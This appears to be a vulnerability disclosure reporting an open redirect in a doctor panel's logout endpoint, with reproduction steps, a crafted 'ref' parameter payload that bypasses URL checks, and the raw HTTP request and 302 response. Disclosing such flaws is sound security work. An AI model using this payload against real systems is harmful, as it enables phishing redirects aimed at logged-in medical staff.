There's an Open URL Redirect vulnerability in the logout functionality. If a malicious actor sends the link to the logged in doctor, the application will redirect the doctor to a malicious site.
Steps to Reproduce
- As a logged in Doctor, click on the securely sign out button.
- Notice the endpoint has a ref variable.
- If you submit the following payload, the application will redirect the user to the url provided by the payload:
GET /drpanel/logout.php?ref=//https:\/\/www.google.com HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
HTTP/1.1 302 Found
Date: Sun, 09 May 2021 16:44:09 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
As you can notice, the location header has the google.com url in it, which will take the user to that url.
Since the application does not has a mechanism to validate that the logged in user wants to log out, if the Doctor visits the URL provided by the attacker, it will redirect him/her to the malicious site.